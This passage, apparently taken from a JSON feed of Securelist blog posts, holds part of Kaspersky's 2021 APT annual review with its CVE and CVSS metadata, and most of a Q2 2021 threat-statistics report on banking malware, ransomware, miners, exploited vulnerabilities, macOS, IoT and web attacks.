Some of the servers were targeted multiple times by what appear to be different threat actors (based on the command execution patterns), suggesting the exploits had become available to multiple groups.\n\nWe also discovered a campaign active since mid-March targeting governmental entities in Europe and Asia using the same Exchange zero-day exploits. This campaign made use of a previously unknown malware family that we dubbed FourteenHi. Further investigation revealed traces of activity involving variants of this malware dating back a year. We also found some overlaps in these sets of activities with HAFNIUM in terms of infrastructure and TTPs as well as the use of ShadowPad malware during the same timeframe.\n\nOn January 25, the Google Threat Analysis Group (TAG) announced that a state-sponsored threat actor had targeted security researchers. According to Google TAG's blog, this actor used highly sophisticated social engineering, approached security researchers through social media, and delivered a compromised Visual Studio project file or lured them to their blog where a Chrome exploit was waiting for them. On March 31, Google TAG released an update on this activity showing another wave of fake social media profiles and a company the actor set up mid-March. We confirmed that several pieces of infrastructure listed in the blog overlapped with [our previously published](<https://securelist.com/lazarus-threatneedle/100803/>) reporting about Lazarus group's ThreatNeedle cluster. Moreover, the malware mentioned by Google matched ThreatNeedle \u2013 malware that we have been tracking since 2018. While investigating associated information, a fellow external researcher confirmed that he was also compromised by this attack, sharing information for us to investigate. We discovered additional C2 servers after decrypting configuration data from the compromised host. The servers were still in use during our investigation, and we were able to get additional data related to the attack. 
We assess that the published infrastructure was used not only to target security researchers but also in other Lazarus attacks. We found a relatively large number of hosts communicating with the C2s at the time of our research.\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region. Further analysis revealed that this escalation of privilege (EoP) exploit had potentially been used in the wild since at least November 2020. We reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310. Various marks and artifacts left in the exploit meant that we were highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as Moses. Moses appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from Moses. While the EoP exploit was discovered in the wild, we weren't able to directly tie its usage to any known threat actor that we currently track. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. 
Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an EoP exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 \u2013 RS5, 18362 \u2013 19H1, 18363 \u2013 19H2, 19041 \u2013 20H1, 19042 \u2013 20H2) and exploited two distinct vulnerabilities in the Microsoft Windows OS kernel. We reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8 as part of the June Patch Tuesday. The exploit chain attempts to install malware on the system through a dropper. The malware starts as a system service and loads the payload, a remote shell-style backdoor that in turn connects to the C2 to get commands. Because we couldn't find any connections or overlaps with a known actor, we named this cluster of activity PuzzleMaker.\n\nFinally, late this year, we detected a wave of attacks using an elevation of privilege exploit affecting server variants of the Windows operating system. Upon closer analysis, it turned out to be a zero-day use-after-free vulnerability in Win32k.sys that we reported to Microsoft and that was subsequently fixed as CVE-2021-40449. 
We analyzed the associated malware, dubbed the cluster MysterySnail, and found infrastructure overlaps that link it to the IronHusky APT.\n\n## Firmware vulnerabilities\n\nIn September, we [provided an overview](<https://securelist.com/finspy-unseen-findings/104322/>) of the FinSpy PC implant, covering not only the Windows version, but also Linux and macOS versions. FinSpy is an infamous, commercial surveillance toolset that is used for "legal surveillance" purposes. Several NGOs have repeatedly reported it being used against journalists, political dissidents and human rights activists. Historically, its Windows implant was a single-stage spyware installer, and this version was detected and researched several times up to 2018. Since then, we have observed a decreasing detection rate for FinSpy for Windows. While the nature of this anomaly remained unknown, we began detecting some suspicious installer packages backdoored with Metasploit stagers. We were unable to attribute these packages to any threat actor until the middle of 2019, when we found a host that served these installers among FinSpy Mobile implants for Android. Over the course of our investigation, we found out that the backdoored installers are nothing more than first-stage implants that are used to download and deploy further payloads before the actual FinSpy Trojan. Apart from the Trojanized installers, we also observed infections involving the use of a UEFI or MBR bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our report.\n\nTowards the end of Q3, we identified a previously unknown payload with advanced capabilities, delivered using two infection chains to various government organizations and telecoms companies in the Middle East. 
The payload makes use of a Windows kernel-mode rootkit to facilitate some of its activities and is capable of being persistently deployed through an MBR or a UEFI bootkit. Interestingly enough, some of the components observed in this attack had previously been staged in memory by the Slingshot agent on multiple occasions; Slingshot is a post-exploitation framework that we have covered in several cases in the past (not to be confused with the Slingshot APT). It is mainly known for being a proprietary commercial penetration-testing toolkit officially designed for red team engagements. However, it's not the first time that attackers appear to have taken advantage of it. One of our previous reports from 2019 covering FruityArmor's activity showed that the threat group used the framework to target organizations across multiple industries in the Middle East, possibly by leveraging an unknown exploit in a messenger app as an infection vector. In a recent private intelligence report, we provided a drill-down analysis of the newly discovered malicious toolkit that we observed in tandem with Slingshot and how it was leveraged in clusters of activity in the wild. 
Most notably, we outlined some of the advanced features that are evident in the malware as well as its utilization in a particular long-standing activity against a high-profile diplomatic target in the Middle East.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-30T10:00:31", "type": "securelist", "title": "APT annual review 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-40449"], "modified": "2021-11-30T10:00:31", "id": "SECURELIST:1F59148E6615695438F94EF4956585AA", "href": "https://securelist.com/apt-annual-review-2021/105127/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T10:37:29", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2 2021:\n\n * Kaspersky solutions blocked 1,686,025,551 attacks from online resources across the globe.\n * Web antivirus recognized 675,832,360 unique URLs 
as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 119,252 unique users.\n * Ransomware attacks were defeated on the computers of 97,451 unique users.\n * Our file antivirus detected 68,294,298 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 119,252 unique users.\n\n_Number of unique users attacked by financial malware, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140610/01-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140636/02-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 5.8 \n2 | Tajikistan | 5.0 \n3 | Afghanistan | 4.2 \n4 | Uzbekistan | 3.3 \n5 | Lithuania | 2.9 \n6 | Sudan | 2.8 \n7 | Paraguay | 2.5 \n8 | Zimbabwe | 1.6 \n9 | Costa Rica | 1.5 \n10 | Yemen | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nLast quarter, as per tradition, the most widespread family of bankers was ZeuS/Zbot (17.8%), but its share in Q2 almost halved, by 13 p.p. 
Second place again went to the CliptoShuffler family (9.9%), whose share also fell, by 6 p.p. The Top 3 is rounded out by SpyEye (8.8%), which added 5 p.p., climbing from eighth place. Note the disappearance of Emotet from the Top 10, which was predictable given the liquidation of its infrastructure in the previous quarter.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 17.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 9.9 \n3 | SpyEye | Trojan-Spy.Win32.SpyEye | 8.8 \n4 | Trickster | Trojan.Win32.Trickster | 5.5 \n5 | RTM | Trojan-Banker.Win32.RTM | 3.8 \n6 | Danabot | Trojan-Banker.Win32.Danabot | 3.6 \n7 | Nimnul | Virus.Win32.Nimnul | 3.3 \n8 | Cridex | Backdoor.Win32.Cridex | 2.3 \n9 | Nymaim | Trojan.Win32.Nymaim | 1.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 1.6 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Attack on Colonial Pipeline and closure of DarkSide\n\nRansomware attacks on large organizations continued in Q2. Perhaps the most notable event of the quarter was the [attack by the DarkSide group on Colonial Pipeline](<https://ics-cert.kaspersky.com/reports/2021/05/21/darkchronicles-the-consequences-of-the-colonial-pipeline-attack/>), one of the largest fuel pipeline operators in the US. The incident led to fuel outages and a state of emergency in four states. The results of the investigation, which involved the FBI and several other US government agencies, were reported to US President Joe Biden.\n\nFor the cybercriminals, this sudden notoriety proved unwelcome. In their blog, DarkSide's creators heaped the blame on third-party operators. 
Another post was published stating that DarkSide's developers had lost access to part of their infrastructure and were shutting down the service and the affiliate program.\n\nAnother consequence of this high-profile incident was a new rule on the Russian-language forum XSS, where many developers of ransomware, including REvil (also known as Sodinokibi or Sodin), LockBit and Netwalker, advertise their affiliate programs. The new rule forbade the advertising and selling of any ransomware programs on the site. The administrators of other forums popular with cybercriminals took similar decisions.\n\n#### Closure of Avaddon\n\nAnother family of targeted ransomware whose owners shut up shop in Q2 is Avaddon. At the same time as announcing the shutdown, the attackers [provided](<https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/>) Bleeping Computer with the decryption keys.\n\n#### Clash with Clop\n\nUkrainian police [searched](<https://cyberpolice.gov.ua/news/kiberpolicziya-vykryla-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shyfruvalnyka-ta-nanesenni-inozemnym-kompaniyam-piv-milyarda-dolariv-zbytkiv-2402/>) and arrested members of the Clop group. Law enforcement agencies also deactivated part of the cybercriminals' infrastructure, which [did not](<https://www.bleepingcomputer.com/news/security/clop-ransomware-is-back-in-business-after-recent-arrests/>), however, stop the group's activities.\n\n#### Attacks on NAS devices\n\nIn Q2, cybercriminals stepped up their attacks on network-attached storage (NAS) devices. 
The new [Qlocker](<https://support.qnap.ru/hc/ru/articles/360021328659-\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c-Qnap-Ransomware-Qlocker>) family appeared, which packs user files into a password-protected 7zip archive, while our old friends [ech0raix](<https://www.qnap.com/en/security-advisory/QSA-21-18>) and [AgeLocker](<https://www.qnap.com/en-us/security-advisory/QSA-21-15>) began to gather steam.\n\n### Number of new ransomware modifications\n\nIn Q2 2021, we detected 14 new ransomware families and 3,905 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q2 2020 \u2014 Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141411/03-en-ru-es-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2021, Kaspersky products and technologies protected 97,451 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141438/04-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of ransomware attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141505/05-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.85 \n2 | Ethiopia | 0.51 \n3 | China | 0.49 \n4 | Pakistan | 0.40 \n5 | Egypt | 0.38 \n6 | Indonesia | 0.36 \n7 | Afghanistan | 0.36 \n8 | Vietnam | 0.35 \n9 | Myanmar | 0.35 \n10 | Nepal | 0.33 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | 
**Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 20.66 \n2 | Stop | Trojan-Ransom.Win32.Stop | 19.70 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.10 \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 6.37 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.08 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.87 \n7 | (generic verdict) | Trojan-Ransom.Win32.Agent | 5.19 \n8 | PolyRansom/VirLock | Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom | 2.39 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.48 \n10 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 1.26 \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q2 2021, Kaspersky solutions detected 31,443 new modifications of miners.\n\n_Number of new miner modifications, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141534/06-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 363,516 unique users of Kaspersky products worldwide. 
At the same time, the number of attacked users gradually decreased during the quarter; in other words, the downward trend in miner activity returned.\n\n_Number of unique users attacked by miners, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141602/07-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141627/08-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 3.99 \n2 | Ethiopia | 2.66 \n3 | Rwanda | 2.19 \n4 | Uzbekistan | 1.61 \n5 | Mozambique | 1.40 \n6 | Sri Lanka | 1.35 \n7 | Vietnam | 1.33 \n8 | Kazakhstan | 1.31 \n9 | Azerbaijan | 1.21 \n10 | Tanzania | 1.19 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nQ2 2021 injected some minor changes into our statistics on exploits used by cybercriminals. In particular, the share of exploits for Microsoft Office dropped to 55.81% of the total number of threats of this type. Conversely, the share of exploits attacking popular browsers rose by roughly 3 p.p. to 29.13%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141656/09-en-malware-report-q2-2021-graphs-pc.png>))_\n\nMicrosoft Office exploits most often tried to utilize the memory corruption vulnerability [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). 
This error can occur in the Equation Editor component when processing objects in a specially constructed document, and its exploitation causes a buffer overflow and allows an attacker to execute arbitrary code. Also seen in Q2 was the similar vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), which causes a buffer overflow on the stack in the same component. Lastly, we spotted an attempt to exploit the [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) vulnerability, which, like other bugs in Microsoft Office, permits the execution of arbitrary code in vulnerable versions of the software.\n\nQ2 2021 was marked by the emergence of several dangerous vulnerabilities in various versions of the Microsoft Windows family, many of them observed in the wild. Kaspersky alone found three vulnerabilities used in targeted attacks:\n\n * [CVE-2021-28310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28310>) \u2014 an out-of-bounds (OOB) write vulnerability in the Microsoft DWM Core library used in Desktop Window Manager. Due to insufficient checks in the data array code, an unprivileged user using the DirectComposition API can write their own data to the memory areas they control. As a result, the data of real objects is corrupted, which, in turn, can lead to the execution of arbitrary code;\n * [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) \u2014 an information disclosure vulnerability that exposes information about kernel objects. Together with other exploits, it allows an intruder to attack a vulnerable system;\n * [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) \u2014 a vulnerability in the ntfs.sys file system driver. 
It causes incorrect checking of transferred sizes, allowing an attacker to inflict a buffer overflow by manipulating parameters.\n\nYou can read more about these vulnerabilities and their exploitation in our articles [PuzzleMaker attacks with Chrome zero-day exploit chain](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>) and [Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>).\n\nOther security researchers found a number of browser vulnerabilities, including:\n\n * [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) \u2014 a bug in the Microsoft Trident browser engine (MSHTML) that allows writing data outside the memory of operable objects;\n * Three Google Chrome vulnerabilities found in the wild that exploit bugs in various browser components: [CVE-2021-30551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551>) \u2014 a data type confusion vulnerability in the V8 scripting engine; [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2014 a use-after-free vulnerability in the WebGL component; and [CVE-2021-21220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21220>) \u2014 a heap corruption vulnerability;\n * Three vulnerabilities in the WebKit browser engine, now used mainly in Apple products (for example, the Safari browser), were also found in the wild: [CVE-2021-30661](<https://support.apple.com/en-us/HT212317>) \u2014 a use-after-free vulnerability; [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>) \u2014 a memory corruption vulnerability; and [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>) \u2014 an integer overflow vulnerability.\n\nAll of these vulnerabilities allow a cybercriminal to attack a system unnoticed if the user opens a malicious site in an 
unpatched browser.\n\nIn Q2, two similar vulnerabilities were found ([CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) and [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>)), exploiting integer overflow bugs in the Microsoft Windows Cryptographic Provider component. Using these vulnerabilities, an attacker could prepare a special signed document that would ultimately allow the execution of arbitrary code in the context of an application that uses the vulnerable library.\n\nBut the biggest talking point of the quarter was the [critical vulnerabilities CVE-2021-1675 and CVE-2021-34527](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>) in the Microsoft Windows Print Spooler, in both server and client editions. Their discovery, together with a [proof of concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), caused a stir in both the expert community and the media, which dubbed one of the vulnerabilities PrintNightmare. Exploitation of these vulnerabilities is quite trivial, since Print Spooler is enabled by default in Windows, and the methods of compromise are available even to unprivileged users, including remote ones. In the latter case, the RPC mechanism can be leveraged for compromise. As a result, an attacker with low-level access can take over not only a local machine, but also the domain controller, if these systems have not been updated, or available [risk mitigation methods](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) against these vulnerabilities have not been applied.\n\nAmong the network threats in Q2 2021, attempts to brute-force passwords in popular protocols and services (RDP, SSH, MSSQL, etc.) are still current. 
Attacks using EternalBlue, EternalRomance and other such exploits remain prevalent, although their share is gradually shrinking. New attacks include [CVE-2021-31166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31166>), a vulnerability in the Microsoft Windows HTTP protocol stack that causes a denial of service during processing of web-server requests. To gain control over target systems, attackers are also using the previously found NetLogon vulnerability ([CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>)) and, for servers running Microsoft Exchange Server, vulnerabilities recently discovered while researching targeted attacks by the [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) group.\n\n## Attacks on macOS\n\nAs for threats to the macOS platform, Q2 will be remembered primarily for the appearance of new samples of the XCSSET Trojan. Designed to steal data from browsers and other applications, the malware is notable for spreading itself through infecting projects in the Xcode development environment. The Trojan takes the form of a bash script packed with the SHC utility, allowing it to evade macOS protection, which does not block script execution. 
During execution of the script, the SHC utility uses the RC4 algorithm to decrypt the payload, which, in turn, downloads additional modules.\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.j | 14.47 \n2 | AdWare.OSX.Pirrit.ac | 13.89 \n3 | AdWare.OSX.Pirrit.o | 10.21 \n4 | AdWare.OSX.Pirrit.ae | 7.96 \n5 | AdWare.OSX.Bnodlero.at | 7.94 \n6 | Monitor.OSX.HistGrabber.b | 7.82 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.69 \n8 | AdWare.OSX.Bnodlero.bg | 7.28 \n9 | AdWare.OSX.Pirrit.aa | 6.84 \n10 | AdWare.OSX.Pirrit.gen | 6.44 \n11 | AdWare.OSX.Cimpli.m | 5.53 \n12 | Trojan-Downloader.OSX.Agent.h | 5.50 \n13 | Backdoor.OSX.Agent.z | 4.64 \n14 | Trojan-Downloader.OSX.Lador.a | 3.92 \n15 | AdWare.OSX.Bnodlero.t | 3.64 \n16 | AdWare.OSX.Bnodlero.bc | 3.36 \n17 | AdWare.OSX.Ketin.h | 3.25 \n18 | AdWare.OSX.Bnodlero.ay | 3.08 \n19 | AdWare.OSX.Pirrit.q | 2.84 \n20 | AdWare.OSX.Pirrit.x | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs in the previous quarter, a total of 15 of the Top 20 threats for macOS are adware programs. 
The Pirrit and Bnodlero families have traditionally stood out from the crowd, with the former accounting for two-thirds of the total number of threats.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141728/10-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | India | 3.77 \n2 | France | 3.67 \n3 | Spain | 3.45 \n4 | Canada | 3.08 \n5 | Italy | 3.00 \n6 | Mexico | 2.88 \n7 | Brazil | 2.82 \n8 | USA | 2.69 \n9 | Australia | 2.53 \n10 | Great Britain | 2.33 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q2 2021, first place by share of attacked users went to India (3.77%), where adware applications from the Pirrit family were most frequently encountered. 
A comparable situation was observed in France (3.67%) and Spain (3.45%), which ranked second and third, respectively.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q2 2021, as before, most of the attacks on Kaspersky traps came via the Telnet protocol.\n\nTelnet | 70.55% \n---|--- \nSSH | 29.45% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q2 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 63.06% \n---|--- \nSSH | 36.94% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2021_\n\n**Top 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 30.25% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 27.93% \n3 | Backdoor.Linux.Mirai.ba | 5.82% \n4 | Backdoor.Linux.Agent.bc | 5.10% \n5 | Backdoor.Linux.Gafgyt.a | 4.44% \n6 | Trojan-Downloader.Shell.Agent.p | 3.22% \n7 | RiskTool.Linux.BitCoinMiner.b | 2.90% \n8 | Backdoor.Linux.Gafgyt.bj | 2.47% \n9 | Backdoor.Linux.Mirai.cw | 2.52% \n10 | Backdoor.Linux.Mirai.ad | 2.28% \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT threat statistics are published in our Q2 2021 DDoS report: <https://securelist.com/ddos-attacks-in-q2-2021/103424/#attacks-on-iot-honeypots>\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. 
Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that serve as sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q2 2021, Kaspersky solutions blocked 1,686,025,551 attacks from online resources located across the globe. 675,832,360 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141800/13-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 23.65 \n2 | Mauritania | 19.04 \n3 | Moldova | 18.88 \n4 | Ukraine | 18.37 \n5 | Kyrgyzstan | 17.53 \n6 | Algeria | 17.51 \n7 | Syria | 15.17 \n8 | Uzbekistan | 15.16 \n9 | Kazakhstan | 14.80 \n10 | Tajikistan | 14.70 \n11 | Russia | 14.54 \n12 | Yemen | 14.38 \n13 | Tunisia | 13.40 \n14 | Estonia | 13.36 \n15 | Latvia | 13.23 \n16 | Libya | 13.04 \n17 | Armenia | 12.95 \n18 | Morocco | 12.39 \n19 | Saudi Arabia | 12.16 \n20 | Macao | 11.67 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average during the quarter, 9.43% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141830/14-en-malware-report-q2-2021-graphs-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. 
